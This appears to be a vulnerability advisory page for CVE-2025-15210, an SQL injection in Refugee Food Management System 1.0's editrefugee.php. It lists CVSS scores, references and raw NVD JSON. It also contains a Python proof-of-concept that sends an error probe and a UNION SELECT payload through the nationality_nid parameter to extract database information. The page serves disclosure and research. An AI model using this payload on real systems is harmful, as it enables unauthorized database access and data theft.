CVE-2025-15210

Description

A security vulnerability has been detected in code-projects Refugee Food Management System 1.0. This vulnerability affects unknown code of the file /home/editrefugee.php. Such manipulation of the argument a/b/c/sex/d/e/nationality_nid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:refugee_food_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Refugee Food Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-15210 SQL Injection PoC
# Target: Refugee Food Management System 1.0
# File: /home/editrefugee.php
# Parameter: nationality_nid

import requests
import sys

target_url = "http://target.com/home/editrefugee.php"

# Basic SQL Injection test - detect vulnerability
def test_basic_injection():
    payload = "'"
    params = {
        "a": "1",
        "b": "2",
        "c": "3",
        "sex": "male",
        "d": "4",
        "e": "5",
        "nationality_nid": payload
    }
    try:
        response = requests.get(target_url, params=params, timeout=10)
        if "sql" in response.text.lower() or response.status_code == 500:
            print("[+] Vulnerability detected!")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

# UNION-based injection to extract database info
def extract_database_info():
    # Payload to get database version and name
    payload = "' UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12-- -"
    params = {
        "a": "1",
        "b": "2",
        "c": "3",
        "sex": "male",
        "d": "4",
        "e": "5",
        "nationality_nid": payload
    }
    try:
        response = requests.get(target_url, params=params, timeout=10)
        if response.status_code == 200:
            print("[+] Database information extracted")
            print(response.text[:500])
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    print("CVE-2025-15210 SQL Injection PoC")
    if len(sys.argv) > 1:
        target_url = sys.argv[1]
    test_basic_injection()
    extract_database_info()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15210
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15210
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15210/
[4] VulDB https://vuldb.com/cve/CVE-2025-15210
[5] https://code-projects.org/
[6] https://github.com/YZS17/CVE/blob/main/Refugee%20Food_Management_System/sqli_editrefugee.php.md
[7] https://vuldb.com/?ctiid.338595
[8] https://vuldb.com/?id.338595
[9] https://vuldb.com/?submit.722804
[10] https://github.com/YZS17/CVE/blob/main/Refugee%20Food_Management_System/sqli_editrefugee.php.md

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15210", "sourceIdentifier": "[email protected]", "published": "2025-12-30T00:15:51.273", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in code-projects Refugee Food Management System 1.0. This vulnerability affects unknown code of the file /home/editrefugee.php. Such manipulation of the argument a/b/c/sex/d/e/nationality_nid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed publicly and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:refugee_food_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "139EB45E-C3B2-4D66-9726-407503660379"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/YZS17/CVE/blob/main/Refugee%20Food_Management_System/sqli_editrefugee.php.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.338595", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.338595", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.722804", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://github.com/YZS17/CVE/blob/main/Refugee%20Food_Management_System/sqli_editrefugee.php.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}